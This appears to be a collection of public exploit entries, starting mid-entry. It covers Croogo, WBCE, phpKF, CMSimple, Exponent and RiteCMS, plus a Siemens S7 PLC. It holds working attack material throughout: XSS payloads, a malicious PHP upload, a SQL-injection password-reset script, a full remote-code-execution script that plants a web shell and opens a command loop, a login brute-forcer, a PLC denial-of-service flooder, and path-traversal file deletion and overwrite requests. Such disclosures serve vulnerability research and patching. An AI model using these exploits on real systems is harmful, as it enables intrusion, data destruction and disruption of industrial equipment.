_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply ==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <== POST /admin/file-manager/attachments/edit/20 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 363 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/file-manager/attachments/edit/20 Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 _method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply

# Exploit Title: Croogo 3.0.2 - Unrestricted File Upload # Date: 06/12/2021 # Exploit Author: Enes Özeser # Vendor Homepage: https://croogo.org/ # Software Link: https://downloads.croogo.org/v3.0.2.zip # Version: 3.0.2 # Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 ==> 'setting-43' Unrestricted File Upload <== 1- Login with your privileged account. 2- Click on the 'Settings' section. 3- Go to the 'Themes'. Directory is '/admin/settings/settings/prefix/Theme' 4- Choose a malicious php script and upload it. 5- Go to the '/uploads/(NAME).php' directory. You must change 'NAME' parameter with your filename you uploaded. 6- The malicious PHP script will be executed. POST /admin/settings/settings/prefix/Theme HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127 Content-Length: 970 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/settings/settings/prefix/Theme Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="_method" POST -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="_csrfToken" c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="setting-43"; filename="malicious.php" Content-Type: application/octet-stream <?php $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="_Token[fields]" c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="_Token[unlocked]" -----------------------------360738881613175158033315978127--

# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset # Google Dork: intext: "Way Better Content Editing" # Date: 20/12/2021 # Exploit Author: citril or https://github.com/maxway2021 # Vendor Homepage: https://wbce.org/ # Software Link: https://wbce.org/de/downloads/ # Version: <= 1.5.1 # Tested on: Linux # CVE : CVE-2021-3817 # Github repo: https://github.com/WBCE/WBCE_CMS # Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75 import requests _url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment _domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature headers = { 'User-Agent': 'Mozilla/5.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close' } _p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue" r = requests.post(url = _url, headers = headers, data = _p) if r.status_code == 200: print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')

# Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated) # Date: 18/12/2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.phpkf.com/ # Software Link: https://www.phpkf.com/indirme.php # Version: 3.00 # Category: Webapps # Tested on: Linux/Windows # phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more. # Contains an endpoint that allows remote access # Necessary checks are not made in the file upload mechanism, only the file extension is checked # The file with the extension ".png" can be uploaded and the extension can be changed. # Example: python3 exploit.py -u http://example.com # python3 exploit.py -u http://example.com -l admin -p Admin123 from bs4 import BeautifulSoup from time import sleep import requests import argparse import json def main(): parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=False) parser.add_argument('-p', '--password', type=str, required=False) args = parser.parse_args() print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") host(args) def host(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print("\n[?] Check Adress...\n") sleep(2) args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass # Check Host Status try: response = requests.get(args.host) if response.status_code == 200: if args.login == None and args.password == None: create_user(args) else: login_user(args) else: print("[-] Address not reachable!") sleep(2) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) def create_user(args): print("[*] Create User!\n") sleep(2) url = args.host + "/phpkf-bilesenler/kayit_yap.php" headers = { "Origin": args.host, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Referer": "http://fuzzing.com/uye-kayit.php", "Accept-Encoding": "gzip, deflate" } data = { "kayit_yapildi_mi": "form_dolu", "oturum": '', "kullanici_adi": "evil", "sifre": "Evil123", "sifre2": "Evil123", "posta": "evil@localhost.com", "kosul": "on" } response = requests.post(url, headers=headers, data=data, allow_redirects=True) args.login = ("evil") args.password = ("Evil123") print("[+] " + args.login + ":" + args.password + "\n") sleep(2) login_user(args) def login_user(args): url = args.host + "/uye-giris.php" headers = { "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/uye-giris.php", "Accept-Encoding": "gzip, deflate" } data = { "kayit_yapildi_mi": "form_dolu", "git": args.host + "/index.php", "kullanici_adi": args.login, "sifre": args.password, "hatirla": "on" } response = requests.post(url, headers=headers, data=data, allow_redirects=False) token = response.cookies.get("kullanici_kimlik") if (token != None): print("[!] Login Success!\n") sleep(2) upload_evil(args, token) else: if args.login == "evil" and args.password == "Evil123": print("[!] Unauthorized user!\n") print("[!] manually add a user and try again\n") print("[!] Go to link " + args.host + "/uye-kayit.php\n") print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'") sleep(2) else: print("[!] Unauthorized user!\n") sleep(2) def upload_evil(args, token): url = args.host + "/phpkf-bilesenler/yukleme/index.php" cookies = { "kullanici_kimlik": token, "dil": "en" } headers = { "VERICEK": "", "DOSYA-ADI": "evil.png", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Content-type": "application/x-www-form-urlencoded; charset=utf-8", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/oi_yaz.php", "Accept-Encoding": "gzip, deflate" } data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>" response = requests.post(url, headers=headers, cookies=cookies, data=data) if (response.text == "yuklendi"): print("[!] Upload Success!\n") sleep(2) change_name(args, token) else: print("[!] Upload Failed!\n") sleep(2) def change_name(args, token): url = args.host + "/phpkf-bilesenler/yukleme/index.php" cookies = { "kullanici_kimlik": token, "dil": "en" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/oi_yaz.php", "Accept-Encoding": "gzip, deflate" } data = { "yenidenadlandir": "evil.png|evil.php", "vericek": "/" } response = requests.post(url, headers=headers, cookies=cookies, data=data) if (response.text == "Name successfully changed..."): print("[!] Change Name evil.php!\n") sleep(2) find_dict(args, token) else: print("[!] Change Failed!\n") sleep(2) def find_dict(args, token): url = args.host + "/phpkf-bilesenler/yukleme/index.php" cookies = { "kullanici_kimlik": token, "dil": "en" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/oi_yaz.php", "Accept-Encoding": "gzip, deflate" } data = { "vericek": "/", "dds": "0" } response = requests.post(url, headers=headers, cookies=cookies, data=data) if (response.text == "You can not upload files!"): print("[!] File not found!\n") sleep(2) else: print("[!] Find Vuln File!\n") sleep(2) soup = BeautifulSoup(response.text, 'html.parser') path = soup.find("div").contents[1].replace(" ", "") exploit(args, path) def exploit(args, path): print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + path + "evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()

# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS) # Date: 22/10/2021 # Exploit Author: heinjame # Vendor Homepage: https://www.cmsimple.org/en/ # Software Link: https://www.cmsimple.org/en/?Downloads # Version: <=5.4 # Tested on: Linux os [Description] Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding. So the application let's attacker perform DOM based XSS. [Payload and POC] File > images > Upload a file Attack vector >> ')-alert(1)// (need to encode)>> &#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47; When the victim clicks the delete button,an alert will be executed. Script to encode the payload payload = input() finalpayload = "" for i in payload: finalpayload = finalpayload + "&#" + str(ord(i)) + ";" print(finalpayload)

# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities # Exploit Author: heinjame # Date: 22/10/2021 # Exploit Author: picaro_o # Vendor Homepage: https://www.exponentcms.org/ # Version: <=2.6 # Tested on: Linux os *Stored XSS* Affected parameter = > http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title, Text Block) Payload = <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> ** *Database credential are disclosed in response *** POC ``` var adminerwindow = function (){ var win = window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms'); if (!win) { err(); } } ``` **Authentication Bruteforce* ``` import argparse import requests import sys parser = argparse.ArgumentParser() parser.add_argument("url", help="URL") parser.add_argument("Username list", help="Username List") parser.add_argument("Password list", help="Password List") pargs = parser.parse_args() host = sys.argv[1] userlist = sys.argv[2] passlist = sys.argv[3] try: readuser = open(userlist) readpass = open(passlist) except: print("Unable to load files") exit() def usernamebrute(): s = requests.Session() for username in readuser.readlines(): brute={ 'controller':(None,'users'), 'src':(None,''), 'int':(None,''), 'action':(None,'send_new_password'), 'username':(None,username.strip()), } bruteforce = s.post(host+"/index.php",files=brute) status = s.get(host+"/users/reset_password") if "administrator" in status.text: print("[+] Found username : "+ username) adminaccount = username checkpoint = True return adminaccount,checkpoint break def passwordbrute(adminaccount): s = requests.Session() s.cookies.set("csrftoken", "abc") header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1', 'Referer': host+'/login/showlogin' } for password in readpass.readlines(): brute={ 'controller':'login', 'src':'', 'int':'', 'action':'login', 'username':adminaccount, 'password':password.strip() } bruteforce = s.post(host+"/index.php",headers=header,data=brute) # print(bruteforce.text) status = s.get(host+"/login/showlogin",cookies=csrf) print(status.text) if "Invalid Username / Password" not in status.text: print("[+] Found Password : "+ password) break adminaccount,checkpoint = usernamebrute() if checkpoint == True: passwordbrute(adminaccount) else: print("Can't find username,We can't proceed sorry :(") ```

# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS) # Date: 21/10/2021 # Exploit Author: RoseSecurity # Vendor Homepage: https://www.siemens.com/us/en.html # Version: Firmware versions >= 3 # Tested on: Siemens S7-300, S7-400 PLCs #!/usr/bin/python3 from scapy.all import * from colorama import Fore, Back, Style from subprocess import Popen, PIPE from art import * import threading import subprocess import time import os import sys import re # Banner print(Fore.RED + r""" ▄▄▄· ▄• ▄▌▄▄▄▄▄ • ▌ ▄ ·. ▄▄▄· ▄▄▄▄▄ ▄▄▄ ▐█ ▀█ █▪██▌•██ ▪ ·██ ▐███▪▐█ ▀█ •██ ▪ ▀▄ █· ▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ ▀ ▀ ▀▀▀ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▄▄▄▄▄▄▄▄ .▄▄▄ • ▌ ▄ ·. ▪ ▐ ▄ ▄▄▄· ▄▄▄▄▄ ▄▄▄ •██ ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██ ▪ ▀▄ █· ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪▀▀▀▀▀▀▀▀ █▪ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ """) time.sleep(1.5) # Get IP to exploit IP = input("Enter the IP address of the device to exploit: ") # Find the mac address of the device Mac = getmacbyip(IP) # Function to send the ouput to "nothing" def NULL (): f = open(os.devnull, 'w') sys.stdout = f # Eternal loop to produce DoS condition def Arnold (): AutomatorTerminator = True while AutomatorTerminator == True: Packet = Ether() Packet.dst = "00:00:00:00:00:00" Packet.src = Mac sendp(Packet) NULL() def Sarah (): AutomatorTerminator = True while AutomatorTerminator == True: Packet = Ether() Packet.dst = "00:00:00:00:00:00" Packet.src = Mac sendp(Packet) NULL() def Kyle (): AutomatorTerminator = True while AutomatorTerminator == True: Packet = Ether() Packet.dst = "00:00:00:00:00:00" Packet.src = Mac sendp(Packet) NULL() # Arnold ArnoldThread = threading.Thread(target=Arnold) ArnoldThread.start() ArnoldThread.join() NULL() # Sarah SarahThread = threading.Thread(target=Sarah) SarahThread.start() SarahThread.join() NULL() # Kyle KyleThread = threading.Thread(target=Kyle) KyleThread.start() KyleThread.join() NULL()

# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) # Date: 25/07/2021 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://ritecms.com/ # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip # Version: <= 3.1.0 # Google Dork: intext:"Powered by RiteCMS" # Tested on: Windows 10, Ubuntu 18, XAMPP # Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd ################ # Description # ################ # RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. ##################################################### # PoC to delete secretConfig.conf file in web root # ##################################################### Steps to Reproduce: 1. Login as admin 2. Go to File Manager 3. Delete any file 4. Intercept the request and replace current file name to any files on the server via parameter "delete". # Assumed there is a secretConfig.conf file in web root PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf" Request: ======== GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1

# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) # Date: 25/07/2021 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://ritecms.com/ # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip # Version: <= 3.1.0 # Google Dork: intext:"Powered by RiteCMS" # Tested on: Windows 10, Ubuntu 18, XAMPP # Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b ################ # Description # ################ # RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the capability of arbitrary file overwrite to modify existing file such as /etc/passwd or /etc/shadow if the current PHP process user is run as root. ############################################################ # PoC to overwrite existing index.php to display phpinfo() # ############################################################ Steps to Reproduce: 1. Login as admin 2. Go to File Manager 3. Then, click Upload file > Browse.. 4. Upload any file and click checkbox name "overwrite file with same name" 4. Intercept the request and replace current file name to any files path on the server via parameter "file_name". PoC: param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php" param filename - with the content of "<?php phpinfo(); ?>" Request: ======== POST /ritecmsv3.1.0/admin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298 Content-Length: 1840 Origin: http://localhost DNT: 1 Connection: close Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre Upgrade-Insecure-Requests: 1 Sec-GPC: 1 -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="mode" filemanager -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="file"; filename="anyfile.txt" Content-Type: application/octet-stream content of the file to overwrite here -- this is example to overwrite index.php to display phpinfo -- <?php phpinfo(); ?> -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="directory" media -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="file_name" ../index.php -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="overwrite_file" true -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="upload_mode" 1 -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="resize_xy" x -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="resize" 640 -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="compression" 80 -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="thumbnail_resize_xy" x -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="thumbnail_resize" 150 -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="thumbnail_compression" 70 -----------------------------351719865731412638493510448298 Content-Disposition: form-data; name="upload_file_submit" OK - Upload file -----------------------------351719865731412638493510448298--